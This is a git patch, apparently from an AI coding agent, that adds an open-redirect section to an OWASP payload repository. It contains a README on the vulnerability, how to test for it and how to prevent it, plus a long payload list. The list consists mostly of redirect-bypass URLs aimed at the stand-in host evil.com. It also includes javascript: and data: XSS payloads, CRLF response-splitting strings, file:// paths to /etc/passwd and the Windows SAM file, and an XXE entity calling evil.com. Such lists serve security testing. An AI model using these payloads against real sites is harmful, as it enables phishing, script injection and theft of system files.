From 79cc1966add64ecdf679a8736c2c4bbf4e8f1747 Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Sun, 4 Jan 2026 18:39:07 +0000
Subject: [PATCH] Add open-redirect folder with comprehensive payloads and
 documentation

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
---
 .../open-redirect/README.md                   |  34 +++
 .../open-redirect/open-redirect-payloads.txt  | 222 ++++++++++++++++++
 2 files changed, 256 insertions(+)
 create mode 100644 OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md
 create mode 100644 OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt

diff --git a/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md
new file mode 100644
index 0000000..a13abc4
--- /dev/null
+++ b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/README.md
@@ -0,0 +1,34 @@
+# Open Redirect Vulnerability
+
+## Description
+Open redirect vulnerabilities occur when a web application accepts user-controllable input that specifies a link to an external site and uses that link in a redirect. This vulnerability can be exploited by attackers to redirect users to malicious websites while making the URL appear legitimate.
+
+## Common Vulnerabilities
+- Unvalidated redirect parameters (e.g., `?url=`, `?redirect=`, `?next=`)
+- Return URL manipulation in authentication flows
+- Post-login redirects
+- Logout redirects
+- URL parameter injection
+- Header-based redirects (e.g., Location, Refresh headers)
+
+## Impact
+- Phishing attacks
+- Credential theft
+- Malware distribution
+- Bypassing security controls (e.g., URL whitelisting)
+- Social engineering attacks
+
+## Testing Approach
+1. Identify redirect parameters in URLs (e.g., `url`, `redirect`, `next`, `return`, `continue`)
+2. Test with external URLs (e.g., `http://evil.com`)
+3. Try various encoding techniques to bypass filters
+4. Test protocol handlers (e.g., `javascript:`, `data:`)
+5. Test absolute and relative paths
+6. Check POST-based redirects in addition to GET parameters
+
+## Prevention
+- Avoid using user-supplied input for redirects
+- Use a mapping of allowed redirect destinations
+- Validate redirect URLs against a whitelist
+- Use relative URLs where possible
+- Implement proper input validation and sanitization
diff --git a/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt
new file mode 100644
index 0000000..9e56482
--- /dev/null
+++ b/OWASP-Top-10/A01-Broken-Access-Control/open-redirect/open-redirect-payloads.txt
@@ -0,0 +1,222 @@
+# Open Redirect Payloads
+
+## Basic External URLs
+http://evil.com
+https://evil.com
+//evil.com
+///evil.com
+////evil.com
+http://evil.com/
+https://evil.com/
+//evil.com/
+
+## Common Parameter Names to Test
+?url=http://evil.com
+?redirect=http://evil.com
+?next=http://evil.com
+?return=http://evil.com
+?continue=http://evil.com
+?destination=http://evil.com
+?redir=http://evil.com
+?returnTo=http://evil.com
+?returnUrl=http://evil.com
+?redirectUrl=http://evil.com
+?redirect_uri=http://evil.com
+?callback=http://evil.com
+?return_to=http://evil.com
+?goto=http://evil.com
+?target=http://evil.com
+?link=http://evil.com
+?out=http://evil.com
+?view=http://evil.com
+?to=http://evil.com
+?image_url=http://evil.com
+?go=http://evil.com
+?file=http://evil.com
+?val=http://evil.com
+?validate=http://evil.com
+?domain=http://evil.com
+?checkout_url=http://evil.com
+?success=http://evil.com
+?failure=http://evil.com
+?login=http://evil.com
+?logout=http://evil.com
+
+## Protocol Manipulation
+///evil.com
+////evil.com
+/////evil.com
+\\evil.com
+\\\\evil.com
+\/\/evil.com
+/\/\/evil.com
+
+## Using @ Symbol
+http://legitimate.com@evil.com
+https://legitimate.com@evil.com
+//legitimate.com@evil.com
+http://legitimate.com%40evil.com
+
+## URL Encoding
+http%3A%2F%2Fevil.com
+https%3A%2F%2Fevil.com
+%2F%2Fevil.com
+http%3A%2F%2Fevil%2Ecom
+https%3A%2F%2Fevil%2Ecom
+
+## Double URL Encoding
+http%253A%252F%252Fevil.com
+https%253A%252F%252Fevil.com
+%252F%252Fevil.com
+
+## Unicode/UTF-8 Encoding
+http://evil%E3%80%82com
+//evil%E3%80%82com
+//evil%u2215com
+//evil%u2216com
+
+## Null Byte Bypass
+http://evil.com%00.legitimate.com
+https://evil.com%00.legitimate.com
+//evil.com%00.legitimate.com
+
+## Whitespace Bypass
+http://evil.com%20
+http://evil.com%09
+http://evil.com%0a
+http://evil.com%0d
+
+## Using Localhost/Internal IPs
+http://127.0.0.1
+http://localhost
+http://0.0.0.0
+http://[::1]
+http://2130706433 (decimal IP)
+http://0x7f000001 (hex IP)
+
+## Domain Manipulation
+http://evil.com.legitimate.com
+http://legitimate.com.evil.com
+http://evil-legitimate.com
+http://legitimate-evil.com
+
+## Subdomain Takeover
+http://subdomain.legitimate.com
+//subdomain.legitimate.com
+
+## XSS via Redirect (javascript: protocol)
+javascript:alert(1)
+javascript:alert('XSS')
+javascript://evil.com%0Aalert(1)
+javascript:eval(atob('YWxlcnQoMSk='))
+
+## Data URI
+data:text/html,<script>alert(1)</script>
+data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
+
+## File Protocol
+file:///etc/passwd
+file://C:/Windows/System32/config/sam
+
+## Wildcard Bypasses
+http://evil*.com
+http://*.evil.com
+
+## Bypass using Backslash
+http:\\evil.com
+https:\\evil.com
+
+## Using Question Mark
+http://legitimate.com?evil.com
+http://legitimate.com?@evil.com
+
+## Using Hash
+http://legitimate.com#evil.com
+http://legitimate.com#@evil.com
+
+## Bypass with Partial URL
+evil.com
+//evil.com
+///evil.com
+
+## Using Different TLDs
+http://evil.co
+http://evil.io
+http://evil.net
+http://evil.org
+
+## CRLF Injection for Header Manipulation
+%0d%0aLocation:%20http://evil.com
+%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:25%0d%0a%0d%0a<script>alert(1)</script>
+%0aLocation:%20http://evil.com
+
+## IPv6 Addresses
+http://[::ffff:7f00:1]
+http://[0:0:0:0:0:ffff:127.0.0.1]
+
+## Punycode/IDN Homograph
+http://xn--e1awd7f.com (example using Cyrillic characters)
+http://xn--80a7a.com
+
+## Using Subpaths
+http://legitimate.com/redirect?url=http://evil.com
+http://legitimate.com/redirect?url=//evil.com
+http://legitimate.com/redirect?url=///evil.com
+
+## Combined Techniques
+http://legitimate.com@evil.com?redirect=http://evil.com
+//legitimate.com@evil.com%2F
+http://evil.com%23legitimate.com
+http://evil.com%3Flegitimate.com
+
+## Special Characters
+http://evil。com (using Unicode dot)
+http://evil。com (using full-width dot)
+http://evil%E3%80%82com
+
+## Bypass with URL Fragments
+#http://evil.com
+#//evil.com
+
+## Using Meta Refresh
+<meta http-equiv="refresh" content="0;url=http://evil.com">
+
+## Mixed Case to Bypass Filters
+HTtp://evil.com
+HttPs://evil.com
+hTTp://evil.com
+
+## Decimal Encoding
+http://1.2.3.4 (where 1.2.3.4 is the decimal representation)
+
+## Octal Encoding
+http://0177.0.0.01 (octal for 127.0.0.1)
+
+## Using Port Numbers
+http://evil.com:80
+http://evil.com:443
+http://evil.com:8080
+
+## Path Confusion
+/http://evil.com
+\/http://evil.com
+//http://evil.com
+
+## Relative Path Manipulation
+../../../evil.com
+..%2F..%2F..%2Fevil.com
+
+## Using Open Graph Protocol
+http://legitimate.com/og?image=http://evil.com/image.jpg
+
+## Flash-based Redirect
+http://legitimate.com/flash.swf?url=http://evil.com
+
+## PDF-based Redirect
+http://legitimate.com/file.pdf#http://evil.com
+
+## Using Referrer Header
+Referer: http://evil.com
+
+## XML External Entity (XXE) for Redirect
+<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com">]><foo>&xxe;</foo>